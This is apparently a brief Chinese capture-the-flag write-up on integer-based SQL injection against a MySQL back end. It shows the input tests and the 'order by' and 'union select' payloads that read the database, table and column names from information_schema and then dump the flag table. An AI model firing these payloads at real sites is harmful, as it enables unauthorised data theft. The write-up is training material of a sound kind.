MySQL结构
-
对注入条件进行测试
输入 1 时正常返回
输入 1’ 时无法正常返回
输入 1+1 时正常返回 id=2 的值
说明存在整数型SQL注入
-
使用 order by 检查字段数
字段数为 2
使用 1 union select 1,2,3 检查输出字段数
与order by 得出的结果相同
-
-1 union select 1,database() #得出表名:sqli -
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #得出表名 -
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='gicfxvzawq' #得出列名 -
-1 union select 1,group_concat(mmtpisrhwd) from sqli.gicfxvzawq #得出表中数据 -
得到flag